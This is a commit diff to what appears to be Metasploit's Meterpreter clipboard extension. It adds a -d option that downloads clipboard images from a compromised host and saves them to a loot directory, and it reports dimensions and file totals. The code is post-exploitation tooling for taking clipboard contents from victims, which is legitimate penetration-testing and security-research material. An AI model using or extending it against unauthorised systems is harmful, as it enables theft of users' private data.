Add support for optional image downloading

Without -d, `CF_DIB` types will just show image dimensions. Running with -d will result in the image being looted.
2013-11-02 23:07:13 +10:00 · 2013-11-02 23:07:13 +10:00 · 67fbeacbf0
parent 1f6c320bb3
commit 67fbeacbf0
3 changed files with 43 additions and 23 deletions
--- a/lib/rex/post/meterpreter/extensions/extapi/clipboard/clipboard.rb
+++ b/lib/rex/post/meterpreter/extensions/extapi/clipboard/clipboard.rb
@ -22,11 +22,15 @@ class Clipboard

  # Get the target clipboard data in whichever format we can
  # (if it's supported.
-  def get_data()
+  def get_data(download = false)
    results = []

    request = Packet.create_request('extapi_clipboard_get_data')

+    if download
+      request.add_tlv(TLV_TYPE_EXT_CLIPBOARD_DOWNLOAD, true)
+    end
+
    response = client.send_request(request)

    text = response.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT)
@ -38,8 +42,6 @@ class Clipboard
      }
    end

-    files = response.get_tlv_values(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE)
-
    files = []
    response.each(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE) { |f|
      files << {
@ -55,13 +57,15 @@ class Clipboard
      }
    end

-    jpg = response.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_JPG)
-
-    if not jpg.nil?
-      results << {
-        :type => :jpg,
-        :data => jpg
-      }
+    response.each(TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG) do |jpg|
+      if not jpg.nil?
+        results << {
+          :type   => :jpg,
+          :width  => jpg.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG_DIMX),
+          :height => jpg.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG_DIMY),
+          :data   => jpg.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG_DATA)
+        }
+      end
    end

    return results
--- a/lib/rex/post/meterpreter/extensions/extapi/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/extapi/tlv.rb
@ -28,11 +28,17 @@ TLV_TYPE_EXT_SERVICE_QUERY_LOADORDERGROUP   = TLV_META_TYPE_STRING | (TLV_TYPE_E
 TLV_TYPE_EXT_SERVICE_QUERY_INTERACTIVE      = TLV_META_TYPE_BOOL   | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 25)
 TLV_TYPE_EXT_SERVICE_QUERY_DACL             = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 26)

+TLV_TYPE_EXT_CLIPBOARD_DOWNLOAD             = TLV_META_TYPE_BOOL   | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 35)
+
 TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT            = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 40)
 TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE            = TLV_META_TYPE_GROUP  | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 41)
 TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_NAME       = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 42)
 TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_SIZE       = TLV_META_TYPE_QWORD  | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 43)
-TLV_TYPE_EXT_CLIPBOARD_TYPE_JPG             = TLV_META_TYPE_RAW    | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 44)
+
+TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG       = TLV_META_TYPE_GROUP  | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 45)
+TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG_DIMX  = TLV_META_TYPE_UINT   | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 46)
+TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG_DIMY  = TLV_META_TYPE_UINT   | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 47)
+TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG_DATA  = TLV_META_TYPE_RAW    | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 48)

 end
 end
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb
@ -39,7 +39,7 @@ class Console::CommandDispatcher::Extapi::Clipboard
  #
  @@get_data_opts = Rex::Parser::Arguments.new(
    "-h" => [ false, "Help banner" ],
-    "-d" => [ false, "Download content, such as files (if applicable)" ]
+    "-d" => [ false, "Download content, such as files, bitmap info (if applicable)" ]
  )

  def print_clipboard_get_data_usage()
@ -66,7 +66,7 @@ class Console::CommandDispatcher::Extapi::Clipboard
    }

    # currently we only support text values
-    results = client.extapi.clipboard.get_data()
+    results = client.extapi.clipboard.get_data(download_content)

    if results.length == 0
      print_error( "The current Clipboard data format is not supported." )
@ -84,18 +84,24 @@ class Console::CommandDispatcher::Extapi::Clipboard
          print_line()

        when :jpg
-          loot_dir = generate_loot_dir( true )
-          file = Rex::Text.rand_text_alpha(8) + ".jpg"
-          path = File.join( loot_dir, file )
-          path = ::File.expand_path( path )
-          ::File.open( path, 'wb' ) do |f|
-            f.write r[:data]
+          print_line()
+          print_line( "Clipboard Image Dimensions: #{r[:width]}x#{r[:height]}" )
+
+          if download_content
+            loot_dir = generate_loot_dir( true )
+            file = Rex::Text.rand_text_alpha(8) + ".jpg"
+            path = File.join( loot_dir, file )
+            path = ::File.expand_path( path )
+            ::File.open( path, 'wb' ) do |f|
+              f.write r[:data]
+            end
+            print_good( "Clipboard image saved to #{path}" )
+
+            Rex::Compat.open_file( path )
+          else
+            print_line( "Re-run with -d to download image." )
          end
          print_line()
-          print_good( "Clipboard image saved to #{path}" )
-          print_line()
-
-          Rex::Compat.open_file( path )

        when :files
          if download_content
@ -117,12 +123,16 @@ class Console::CommandDispatcher::Extapi::Clipboard
              ]
            )

+            total = 0
            r[:data].each { |f|
              table << [f[:name], f[:size]]
+              total += f[:size]
            }

            print_line()
            print_line(table.to_s)
+
+            print_line( "#{r[:data].length} file(s) totalling #{total} bytes" )
          end
      end